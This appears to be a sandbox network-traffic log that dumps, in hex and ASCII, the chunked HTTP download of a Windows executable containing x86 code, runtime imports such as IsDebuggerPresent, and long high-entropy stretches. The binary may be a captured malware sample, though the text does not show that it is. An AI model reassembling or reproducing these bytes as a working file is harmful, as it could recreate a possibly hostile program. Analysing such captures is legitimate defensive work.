                                                                                                  2023-06-21 18:24:03 UTC24INData Raw: 32 30 30 30 0d 0a 00 16 00 00 00 e8 d2 20 00 00 38 5d d0 74 07 8b 45 cc 83 60 70 fd 33 c0 33 d2 e9 4f 02 00 00 39 5d 14 74 0c 83 7d 14 02 7c d0 83 7d 14 24 7f ca 8a 08 56 8b 75 c4 57 89 5d ec 89 5d f0 88 4d ff 8d 78 01 83 be ac 00 00 00 01 7e 18 8d 45 c4 50 0f b6 45 ff 6a 08 50 e8 3e 1e 00 00 8b 75 c4 83 c4 0c eb 11 0f b6 45 ff 8b 8e c8 00 00 00 0f b7 04 41 83 e0 08 3b c3 74 08 8a 07 88 45 ff 47 eb c2 80 7d ff 2d 89 7d f8 75 06 83 4d 18 02 eb 06 80 7d ff 2b 75 09 8a 07 47 89 7d f8 88 45 ff 6a 10 59 39 5d 14 75 25 80 7d ff 30 74 09 c7 45 14 0a 00 00 00 eb 37 8a 07 3c 78 74 0d 3c 58 74 09 c7 45 14 08 00 00 00 eb 24 89 4d 14 39 4d 14 75 1c 80 7d ff 30 75 16 8a 07 3c 78 74 04 3c 58 75 0c 8a 47 01 83 c7 02 88 45 ff 89 7d f8 8b 45 14 99 52 8b f8 57 6a ff 6a ff
                                                                                                  Data Ascii: 2000 8]tE`p33O9]t}|}$VuW]]Mx~EPEjP>uEA;tEG}-}uM}+uG}EjY9]u%}0tE7<xt<XtE$M9Mu}0u<xt<XuGE}ERWjj
                                                                                                  2023-06-21 18:24:03 UTC32INData Raw: 8c a5 c0 fd ff ff
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC32INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC32INData Raw: 32 30 30 30 0d 0a 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 45 04 8d 4d 04 89 8d f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 85 e8 fd ff ff 8b 49 fc 89 8d e4 fd ff ff 8b 4d 0c 89 8d e0 fc ff ff 8b 4d 10 89 8d e4 fc ff ff 89 85 ec fc ff ff ff 15 54 11 40 00 6a 00 8b f8 ff 15 50 11 40 00 8d 85 d8 fc ff ff 50 ff 15 4c 11 40 00 85 c0 75 10 85 ff 75 0c 83 fb ff 74 07 53 e8 cc 31 00 00 59 8b 4d fc 5f 33 cd 5b e8 46 2a 00 00 c9 c3 8b ff 56 6a 01 be 17 04 00 c0 56 6a 02 e8 c5 fe ff ff 83 c4 0c 56 ff 15 58 11 40 00 50 ff 15 54 10 40 00 5e c3 8b ff 55 8b ec ff 35 8c 8d 42 00 ff 15 1c 11 40 00 85 c0 74 03 5d ff e0 ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 af ff ff ff cc 33 c0 50 50 50 50 50 e8 c7 ff ff ff 83 c4 14 c3 cc cc cc cc 8b 44 24 08 8b 4c 24 10 0b
                                                                                                  Data Ascii: 2000fEM0IMMT@jP@PL@uutS1YM_3[F*VjVjVX@PT@^U5B@t]uuuuu3PPPPPD$L$
                                                                                                  2023-06-21 18:24:03 UTC40INData Raw: 00 08 00 00 89 06
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC40INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC40INData Raw: 32 30 30 30 0d 0a eb 10 8b 06 25 ff f7 ff ff 0d 00 04 00 00 eb ee 21 16 8b 01 c1 e8 02 83 e0 07 2b c3 74 15 48 74 07 48 75 1a 21 16 eb 16 8b 06 23 c2 0d 00 02 00 00 eb 09 8b 06 23 c2 0d 00 03 00 00 89 06 39 5d 20 74 07 d9 41 50 d9 1f eb 05 dd 41 50 dd 1f 5f 5e 5b 5d c3 8b ff 55 8b ec 83 ec 14 8b 45 08 53 56 33 db 8b f0 83 e6 1f 43 89 75 fc a8 08 74 14 84 5d 10 74 0f 53 e8 93 05 00 00 59 83 e6 f7 e9 92 01 00 00 a8 04 74 16 f6 45 10 04 74 10 6a 04 e8 79 05 00 00 59 83 e6 fb e9 78 01 00 00 84 c3 0f 84 9a 00 00 00 f6 45 10 08 0f 84 90 00 00 00 6a 08 e8 57 05 00 00 8b 45 10 59 b9 00 0c 00 00 23 c1 74 54 3d 00 04 00 00 74 37 3d 00 08 00 00 74 1a 3b c1 75 62 d9 ee 8b 4d 0c dc 19 df e0 dd 05 58 5d 41 00 f6 c4 05 7b 4c eb 48 d9 ee 8b 4d 0c dc 19 df e0 f6 c4 05 7b
                                                                                                  Data Ascii: 2000%!+tHtHu!##9] tAPAP_^[]UESV3Cut]tSYtEtjyYxEjWEY#tT=t7=t;ubMX]A{LHM{
                                                                                                  2023-06-21 18:24:03 UTC48INData Raw: 00 00 e8 db c0 ff
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC48INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC48INData Raw: 32 30 30 30 0d 0a ff eb d2 8b c3 c1 f8 05 8d 3c 85 c0 70 b2 01 8b f3 83 e6 1f c1 e6 06 8b 07 0f be 44 30 04 83 e0 01 74 c6 53 e8 42 04 00 00 59 83 65 fc 00 8b 07 f6 44 30 04 01 74 14 ff 75 10 ff 75 0c 53 e8 6e f8 ff ff 83 c4 0c 89 45 e4 eb 17 e8 ee ae ff ff c7 00 09 00 00 00 e8 f6 ae ff ff 83 20 00 83 4d e4 ff c7 45 fc fe ff ff ff e8 0c 00 00 00 8b 45 e4 e8 8f c9 ff ff c3 8b 5d 08 53 e8 8a 04 00 00 59 c3 8b ff 55 8b ec ff 05 94 8d 42 00 68 00 10 00 00 e8 f3 eb ff ff 59 8b 4d 08 89 41 08 85 c0 74 0d 83 49 0c 08 c7 41 18 00 10 00 00 eb 11 83 49 0c 04 8d 41 14 89 41 08 c7 41 18 02 00 00 00 8b 41 08 83 61 04 00 89 01 5d c3 cc cc cc cc cc 53 56 57 8b 54 24 10 8b 44 24 14 8b 4c 24 18 55 52 50 51 51 68 60 ad 40 00 64 ff 35 00 00 00 00 a1 90 5d 41 00 33 c4 89 44
                                                                                                  Data Ascii: 2000<pD0tSBYeD0tuuSnE MEE]SYUBhYMAtIAIAAAAa]SVWT$D$L$URPQQh`@d5]A3D
                                                                                                  2023-06-21 18:24:03 UTC56INData Raw: 07 8b 45 e4 83 60
                                                                                                  Data Ascii: E`
                                                                                                  2023-06-21 18:24:03 UTC56INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC56INData Raw: 32 30 30 30 0d 0a 70 fd 6a 03 58 eb 2f 83 f8 02 75 1c 38 5d e8 74 07 8b 45 e4 83 60 70 fd 6a 04 eb e8 f6 45 ec 01 75 ea f6 45 ec 02 75 ce 38 5d e8 74 07 8b 45 e4 83 60 70 fd 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 8b ca ff ff c9 c3 8b ff 55 8b ec 83 ec 28 a1 90 5d 41 00 33 c5 89 45 fc 53 56 8b 75 08 57 ff 75 10 8b 7d 0c 8d 4d dc e8 e2 7e ff ff 8d 45 dc 50 33 db 53 53 53 53 57 8d 45 d8 50 8d 45 f0 50 e8 06 0f 00 00 89 45 ec 8d 45 f0 56 50 e8 a8 09 00 00 83 c4 28 f6 45 ec 03 75 2b 83 f8 01 75 11 38 5d e8 74 07 8b 45 e4 83 60 70 fd 6a 03 58 eb 2f 83 f8 02 75 1c 38 5d e8 74 07 8b 45 e4 83 60 70 fd 6a 04 eb e8 f6 45 ec 01 75 ea f6 45 ec 02 75 ce 38 5d e8 74 07 8b 45 e4 83 60 70 fd 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 e3 c9 ff ff c9 c3 8b ff 55 8b ec 8b 4d 14 53 8b 59 0c
                                                                                                  Data Ascii: 2000pjX/u8]tE`pjEuEu8]tE`p3M_^3[U(]A3ESVuWu}M~EP3SSSSWEPEPEEVP(Eu+u8]tE`pjX/u8]tE`pjEuEu8]tE`p3M_^3[UMSY
                                                                                                  2023-06-21 18:24:03 UTC64INData Raw: bb 00 02 00 00 f6
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC64INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC64INData Raw: 31 66 66 38 0d 0a c2 08 74 02 0b c3 f6 c2 04 74 05 0d 00 04 00 00 f6 c2 02 74 05 0d 00 08 00 00 f6 c2 01 74 05 0d 00 10 00 00 bf 00 01 00 00 f7 c2 00 00 08 00 74 02 0b c7 8b ca be 00 03 00 00 23 ce 74 1f 3b cf 74 16 3b cb 74 0b 3b ce 75 13 0d 00 60 00 00 eb 0c 0d 00 40 00 00 eb 05 0d 00 20 00 00 b9 00 00 00 03 5f 23 d1 5e 5b 81 fa 00 00 00 01 74 16 81 fa 00 00 00 02 74 0a 3b d1 75 0f 0d 00 80 00 00 c3 83 c8 40 c3 0d 40 80 00 00 c3 8b ff 55 8b ec 83 ec 14 53 56 57 9b d9 7d fc 66 8b 5d fc 33 d2 f6 c3 01 74 03 6a 10 5a f6 c3 04 74 03 83 ca 08 f6 c3 08 74 03 83 ca 04 f6 c3 10 74 03 83 ca 02 f6 c3 20 74 03 83 ca 01 f6 c3 02 74 06 81 ca 00 00 08 00 0f b7 cb 8b c1 be 00 0c 00 00 23 c6 bf 00 03 00 00 74 24 3d 00 04 00 00 74 17 3d 00 08 00 00 74 08 3b c6 75 12 0b
                                                                                                  Data Ascii: 1ff8ttttt#t;t;t;u`@ _#^[tt;u@@USVW}f]3tjZttt tt#t$=t=t;u
                                                                                                  2023-06-21 18:24:03 UTC72INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:03 UTC72INData Raw: d2 8a ff ff b8 e0 42 41 00 e9 7c ee ff ff c7 05 40 8d 42 00 e4 12 40 00 b9 40 8d 42 00 e9 00 3a ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: BA|@B@@B:
                                                                                                  2023-06-21 18:24:03 UTC80INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC80INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:03 UTC88INData Raw: 68 61 6e 64 6c 65
                                                                                                  Data Ascii: handle
                                                                                                  2023-06-21 18:24:03 UTC88INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC88INData Raw: 32 30 30 30 0d 0a 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 a5 04 53 65 74 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 03 49 73 44 65 62 75 67 67 65 72 50 72 65 73 65 6e 74 00 c0 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 39 03 4c 65 61 76 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 6f 04 53 65 74 48 61 6e 64 6c 65 43 6f 75 6e 74 00 00 64 02 47 65 74 53 74 64 48 61 6e 64 6c 65 00 00 e3 02 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 41 6e 64 53 70 69 6e 43 6f 75 6e 74 00 f3 01 47 65 74 46 69 6c 65 54 79 70 65 00 d1 00 44 65 6c 65 74 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 52 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 19 01 45 78 69 74 50 72 6f 63 65
                                                                                                  Data Ascii: 2000dExceptionFilterSetUnhandledExceptionFilterIsDebuggerPresentGetCurrentProcess9LeaveCriticalSectionoSetHandleCountdGetStdHandleInitializeCriticalSectionAndSpinCountGetFileTypeDeleteCriticalSectionRCloseHandleExitProce
                                                                                                  2023-06-21 18:24:03 UTC96INData Raw: 45 8b 60 f8 77 f0
                                                                                                  Data Ascii: E`w
                                                                                                  2023-06-21 18:24:03 UTC96INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC96INData Raw: 32 30 30 30 0d 0a 3d 91 fb 7b d0 2b 7e b4 66 0d 67 f4 cc b4 a0 97 36 8f 64 6a 0a 6c 2d 78 ae 0f 77 30 fd 12 18 37 88 25 8a 35 54 ea 31 7b a8 f5 c3 d0 dd c8 21 6b 2a d1 8f 22 67 4e 05 fa c7 a6 14 cf bd a2 72 a7 f2 f8 1b 71 71 82 5f a3 15 ef 59 7f e6 33 b1 d2 ee 31 7a ba e3 d2 18 bc 38 42 96 5b d0 a1 29 1e a3 37 1d 55 6f c0 bc 57 2f ff 22 62 ef bb a4 a9 df 8b 85 cf 1c dd 53 4e c3 12 65 ba be d5 99 95 67 60 ab 56 b6 2d 28 3b e1 69 fc 7b 86 1c 34 45 42 d2 21 01 05 d5 73 5e da 13 f3 b9 4d 44 73 6f b5 8c 63 eb 57 12 55 52 f7 21 78 e7 51 d3 d7 33 51 7b 52 39 e9 23 66 76 98 0b ca 36 11 df c4 ec fe ac e8 cb a5 24 86 ed 28 3f eb 1e d8 ef 0f 08 a1 56 ea 82 ab 81 cd e7 58 0a 5e 9a b9 20 a7 38 93 29 42 f3 04 26 b2 da 9c b8 29 cc d4 31 f9 88 a9 ca 21 3c 86 e7 a8 35 69
                                                                                                  Data Ascii: 2000={+~fg6djl-xw07%5T1{!k*"gNrqq_Y31z8B[)7UoW/"bSNeg`V-(;i{4EB!s^MDsocWUR!xQ3Q{R9#fv6$(?VX^ 8)B&)1!<5i
                                                                                                  2023-06-21 18:24:03 UTC104INData Raw: e5 38 36 4a d0 08
                                                                                                  Data Ascii: 86J
                                                                                                  2023-06-21 18:24:03 UTC104INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC104INData Raw: 32 30 30 30 0d 0a a4 18 0a 75 e4 32 2f 6f 47 2c 2a a5 33 04 af 03 f8 0b aa 72 a9 4e 8c ce 59 34 68 f7 4b 9e 1c f5 b3 70 3d 9e 0a c7 5f 80 d4 33 32 45 bc 3d f8 bf c1 1b 74 e6 89 e4 00 ac 7c 81 29 20 2c 34 87 d1 27 c5 93 b6 28 69 f0 a2 6b 1a ce 61 83 8f 1b f4 d5 0d d0 04 17 85 72 03 50 d7 c9 c6 7f 71 dd d1 95 91 91 ea 2c 58 28 12 df 27 86 90 f4 ec 04 3d c2 45 e6 04 0f 48 aa 01 68 dd ab 97 3a f7 57 ed 9a 85 51 39 9e a2 ac 14 1c 78 e4 3f 10 04 39 1f 88 06 bf 61 98 33 f7 e5 ad 0e cd e0 55 96 7e b0 f7 9a a3 27 ac 8c 2a 45 bd fb 28 3e a5 28 ef ac 5c b5 fd bf d7 67 7e b8 bd 16 22 79 30 e4 6b 3d 2a a1 3f 0d 06 df 33 95 53 7d ef 5c 60 33 96 4a e1 13 f2 dc 32 48 e9 93 06 1c 96 8d 97 79 1b 8a be 2a 20 65 0c f8 aa 7a 38 41 9e fd 70 e6 63 2f f4 80 cd 05 c5 83 ca 9b ad
                                                                                                  Data Ascii: 2000u2/oG,*3rNY4hKp=_32E=t|) ,4'(ikarPq,X('=EHh:WQ9x?9a3U~'*E(>(\g~"y0k=*?3S}\`3J2Hy* ez8Apc/
                                                                                                  2023-06-21 18:24:03 UTC112INData Raw: a9 16 0a c4 84 76
                                                                                                  Data Ascii: v
                                                                                                  2023-06-21 18:24:03 UTC112INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC112INData Raw: 32 30 30 30 0d 0a ad 41 ee 06 9c 27 57 2d 00 b4 52 ff 06 3b cf a7 bb 94 84 75 f6 94 fc d2 2e 1f 04 b6 84 fe 43 6c 79 7d 8f 10 1b e9 e9 f7 b0 cc c6 0f fe 16 79 50 4d 22 80 44 70 b5 7f 9f a1 55 8f 1c 8d 77 57 24 fd 91 a4 34 40 a5 c5 e0 94 5e d5 1f ad 7f de 32 0c 94 12 b5 01 70 e0 e0 bd 84 eb 15 69 79 03 3d 59 15 cd 3d 93 d9 4e 91 96 bc 0c 48 a2 28 43 25 83 b1 41 ae 9a 7e 4d 63 16 f7 01 71 a8 c5 2e 47 8b 07 c8 4e dc a6 e3 e1 01 98 07 85 52 b5 21 55 7a 03 29 e9 66 8f 51 12 6a 0f 95 93 c5 d9 68 08 8a 06 b8 03 cf 0e 45 4b 31 63 a8 a9 88 1d a2 08 9b 4f ac 97 76 41 1e e0 11 30 ba e5 95 5d b4 3a 19 ee 51 8f 74 d6 cb 20 b7 e9 83 37 cf 51 b8 23 3b a3 f4 47 77 7a ea a9 77 06 cd 34 a9 5f d1 93 b6 96 62 1d 7e e3 8b ba 3d 89 7e 1e 06 b5 24 75 b6 ae 31 2c c3 29 8f 4f a8
                                                                                                  Data Ascii: 2000A'W-R;u.Cly}yPM"DpUwW$4@^2piy=Y=NH(C%A~Mcq.GNR!Uz)fQjhEK1cOvA0]:Qt 7Q#;Gwzw4_b~=~$u1,)O
                                                                                                  2023-06-21 18:24:03 UTC120INData Raw: 90 c2 42 02 b7 a3
                                                                                                  Data Ascii: B
                                                                                                  2023-06-21 18:24:03 UTC120INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC120INData Raw: 32 30 30 30 0d 0a da 13 2f b4 55 69 9c 96 a1 6a 2d 1f f7 06 6e e0 9b 9d 89 ba 37 b3 cc 1c f8 00 3f aa f7 8b 82 81 47 3f 33 09 a8 dc 71 36 df b8 86 c1 9e e0 c2 70 05 06 28 c3 21 d3 63 20 61 2f 25 97 54 05 a7 f7 09 fa 88 be 9f 48 07 6e 87 97 c9 0e 4a 80 86 f1 fa 9a ad 28 b6 0b 6c 6a 79 ee f3 1e 74 6a f0 b3 34 bd 8c 63 b0 97 60 7b 37 bd 72 54 a9 6c f1 c9 97 9f 22 da ac c2 79 a1 ab b5 8c df 82 73 29 31 9e bb 36 08 ed 9e a4 0c 08 8e 20 60 07 d6 58 c1 39 cc 51 f6 6b 02 28 bc f7 3c d3 dd 88 38 13 24 45 e6 b5 4c 65 12 a6 b4 51 63 16 8f f0 08 60 1c 9e 77 c1 fe db d2 41 14 20 a5 a0 0a 20 98 f6 62 0f e0 ae 8b 41 60 17 0e 4e e4 76 8a 5c 06 18 8b 0f 14 d1 33 58 52 67 15 97 ee bd 9e 31 2a 87 d9 04 8b 2b dc b4 d6 99 97 36 ab 2b 52 25 34 89 19 6e 32 2d 7d 58 2d 64 62 ef
                                                                                                  Data Ascii: 2000/Uij-n7?G?3q6p(!c a/%THnJ(ljytj4c`{7rTl"ys)16 `X9Qk(<8$ELeQc`wA bA`Nv\3XRg1*+6+R%4n2-}X-db
                                                                                                  2023-06-21 18:24:03 UTC128INData Raw: 32 95 21 bc 00 37
                                                                                                  Data Ascii: 2!7
                                                                                                  2023-06-21 18:24:03 UTC128INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC128INData Raw: 31 66 66 38 0d 0a c5 37 27 ca 53 fd 2d 13 7f 7a d6 83 c3 f7 87 a6 22 89 f9 e3 96 bd 2d d5 2f 15 c5 82 d2 22 77 33 b4 80 05 8f ac 3f e5 ee b3 ca bb 6b 65 64 48 2e f1 04 b3 14 6c 07 7b 29 3a d3 a1 d9 7e 3f ad d3 ef f5 71 b0 15 64 21 c4 d8 9b a8 2d ef e7 bf f8 54 41 68 f5 40 4d e4 fa 4c 3e ea 89 6b e4 ef f5 1c 3a 61 da 11 97 4a 09 6b e6 cd 7d 08 86 f0 ad 03 ba 23 29 80 df 70 e8 03 7a 6e 6e 8f 85 5c 8b 08 8d fa a0 f5 bf 22 ac c9 28 d5 18 ac b3 4e bf 61 7c b7 2b f6 49 9b 0b 01 cf 00 22 90 65 0d 10 4e b7 e5 0a 19 a5 2f 8d 74 29 4c a8 0e 89 77 a6 b0 e5 05 c6 86 d4 08 41 a4 f2 16 54 45 0d 5a eb 11 f6 bf ef c1 1b e9 e4 b5 64 dd 6a 7c a5 1d e2 03 b9 82 8b d4 0a f4 3b ff 6b 72 8c da 89 a5 64 8b 7e 6c 17 58 f8 6b c5 67 c6 0a 7d 95 54 61 55 85 86 4c 86 52 ef 0e bb a0
                                                                                                  Data Ascii: 1ff87'S-z"-/"w3?kedH.l{):~?qd!-TAh@ML>k:aJk}#)pznn\"(Na|+I"eN/t)LwATEZdj|;krd~lXkg}TaULR
                                                                                                  2023-06-21 18:24:03 UTC136INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:03 UTC136INData Raw: a5 e0 c6 42 fb 49 43 a6 5d 83 13 36 b9 39 8e bf 67 d9 ef ee c5 18 bb e3 4b 99 6f 32 26 26 7b 17 84 d0 f6 be 95 1b 53 97 25 ba 1c 2c 92 4c 3f 60 f2 ab 34 0f 38 d7 79 cd 6b c5 ba a9 79 8f fc 22 de 96 4f 48 da 15 89 7a b6 62 74 9f 38 a2 89 cc 00 05 dd c0 f9 9c 93 02 bd 1e 78 d0 aa de 21 63 d6 7a 69 50 72 81 c6 c0 af ef 0c bb 7d b4 da 5d c6 c3 94 8c de 03 98 a5 e8 2a 94 86 ac 81 97 c6 d4 51 1e 81 c8 77 5a fe 29 b1 46 25 b4 51 52 86 3f 57 41 d4 66 0a 78 0c ed 0d b8 35 6a 3e 22 fd bb 82 9b 71 7c b6 45 7a c9 35 f4 f9 4e 01 17 e9 e5 12 b1 26 eb cf 2d aa 9e 77 0a 81 37 7f c5 62 c3 00 4b 03 d9 55 ce 2b e5 cb a0 a4 81 26 61 ae b5 a7 3c d9 4f 1a 6d c6 48 48 41 3f 33 ad 63 07 b6 f8 53 f2 b0 79 09 9c 4c ae 9c 38 fd 83 bc 06 62 5a 15 44 14 da b0 dd bf 1a cc e6 39 1f 56
                                                                                                  Data Ascii: BIC]69gKo2&&{S%,L?`48yky"OHzbt8x!cziPr}]*QwZ)F%QR?WAfx5j>"q|Ez5N&-w7bKU+&a<OmHHA?3cSyL8bZD9V
                                                                                                  2023-06-21 18:24:03 UTC144INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC144INData Raw: 32 30 30 30 0d 0a ca e3 6f 37 ba be ad 25 95 da ef 7b 27 20 1b fc a6 32 e4 45 6f 11 fd 4c 11 bb 4c 38 d4 f8 e4 57 29 b7 19 03 c9 93 c1 5c 7c 2c a2 f4 2b 02 34 9d e7 3c 85 79 7d e3 d9 0e e4 dc d9 4a 95 34 58 9b 4b 26 2c c8 8a c6 f0 f5 de e7 5f 40 66 59 c4 cd d9 88 b8 6f f0 51 1d 8c cd 81 54 99 29 e1 19 ca 6a 86 1b f7 d6 f7 5f c7 ed 9a 1c a3 9a a9 da e6 d4 ed 15 b5 6a 33 7e d2 2e 30 48 3f 9d 35 93 19 bc 53 41 de aa 1d e7 a8 0a cc 2a 5d c9 9a e0 3f 85 39 82 57 7d 5d 98 eb 5f 71 46 ec 7b 56 2f 89 6d 8d 19 e6 1a a0 65 ce ae fd 7b 0d fc 09 2f 47 9e 15 39 2d b0 6f 2c f0 99 df 21 12 b1 7f d3 c4 84 a4 7f 24 fc c2 99 46 0f 5b 5c c1 f9 9a 70 7b 55 a9 da 2b 64 11 0a 6d cb 33 cc 9c 1e 1a ed 94 bc 6b 8e 23 69 3c ba 10 e4 10 4c 7b 03 84 61 eb 20 1c 21 a3 b3 3e 5b 32 d8
                                                                                                  Data Ascii: 2000o7%{' 2EoLL8W)\|,+4<y}J4XK&,_@fYoQT)j_j3~.0H?5SA*]?9W}]_qF{V/me{/G9-o,!$F[\p{U+dm3k#i<L{a !>[2
                                                                                                  2023-06-21 18:24:03 UTC152INData Raw: aa 30 09 ca 69 b8
                                                                                                  Data Ascii: 0i
                                                                                                  2023-06-21 18:24:03 UTC152INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC152INData Raw: 32 30 30 30 0d 0a 93 c3 1f 25 3f f1 26 7c 15 75 0b 9f 3c 51 9d 79 3f e6 4d db 03 b8 3e a1 04 0b fe 5c 93 07 4e 1b 10 47 fc 6c 71 a4 28 ea c2 8a 87 66 27 6b 28 de 17 0f d0 c8 67 29 39 e4 f1 d7 6b 54 e1 c2 24 e6 4c 2a 8f c0 71 f2 1d 25 49 f2 18 d5 9b 31 db f0 cc cf fb c8 63 86 fc 93 86 03 e6 94 c4 28 16 58 88 75 70 21 64 52 dd 9e 91 76 1a 09 a4 c6 0e 8f 20 6d 33 98 ee 42 07 a5 76 52 c1 48 c5 30 58 06 5b b1 7a e6 0e 92 76 33 4c b4 79 0b fd 46 f3 19 46 93 14 2d c1 89 61 a5 a7 2f ea d1 c3 bc 69 99 79 98 7d 58 f1 f8 d1 57 a4 d3 a9 e3 7f 54 8b 0d 7d 89 76 58 c4 f7 9b b4 7a c6 f7 49 c5 ab c1 23 e1 7d 03 59 83 0e eb ef 82 5f c6 39 29 90 6d d2 e9 b9 3f 79 ad 14 96 68 ee 10 c0 ff 00 51 8c 6b 33 60 3e ed 3c a7 c9 1e 53 e2 d5 7f 50 fe 59 bc c6 4d 8c ad af 69 df 59 a6
                                                                                                  Data Ascii: 2000%?&|u<Qy?M>\NGlq(f'k(g)9kT$L*q%I1c(Xup!dRv m3BvRH0X[zv3LyFF-a/iy}XWT}vXzI#}Y_9)m?yhQk3`><SPYMiY
                                                                                                  2023-06-21 18:24:03 UTC160INData Raw: 1c 83 40 5a 05 1e
                                                                                                  Data Ascii: @Z
                                                                                                  2023-06-21 18:24:03 UTC160INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC160INData Raw: 32 30 30 30 0d 0a ff 17 49 3f 59 b2 2e 4a 95 0a 39 df dd 2b 9b 24 ed 46 55 f1 c5 ab 0d 58 58 52 55 8e a9 19 0a 9a 3a 33 55 6e 1f e3 73 81 61 64 75 01 10 56 c9 bb 82 93 c1 c3 d5 2e 28 26 7c cd 39 87 c2 9b 44 d4 d1 be f4 6f 08 71 bf bc 61 ee ec 23 df 49 f2 0a 01 bb 9d b4 8c 49 3e e6 59 d7 ed 5a 42 3a 3e 8e 32 73 ec 6d 57 92 ac 32 e9 f7 8a ea 87 be 10 22 a9 99 7d fe 66 19 78 ec 20 31 4f 6c 9c 6f 1f 6a c9 5c 21 c1 a2 53 22 6b 80 b7 56 84 16 b3 09 cb 0d 0c 97 c1 34 43 ec a3 06 58 01 03 c6 0d 24 c8 96 db 6f 64 d4 83 4a 3f f4 1f 20 40 b0 cd 4a 90 3f e3 99 5f ad 01 f2 21 e5 38 75 9a a6 2d 51 5d d3 f1 c8 c1 29 8f 22 f6 ca 1c d3 7c b0 21 b7 22 fd 8f 1d 80 d4 82 1d ed f1 76 41 fd 26 d1 99 32 55 ec 7f ae b6 20 94 90 ed fe d3 82 e6 00 08 cf 34 e9 d0 b4 cd cb db cc f8
                                                                                                  Data Ascii: 2000I?Y.J9+$FUXXRU:3UnsaduV.(&|9Doqa#II>YZB:>2smW2"}fx 1Oloj\!S"kV4CX$odJ? @J?_!8u-Q])"|!"vA&2U 4
                                                                                                  2023-06-21 18:24:03 UTC168INData Raw: 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC168INData Raw: 0d 0a
                                                                                                  Data Ascii:
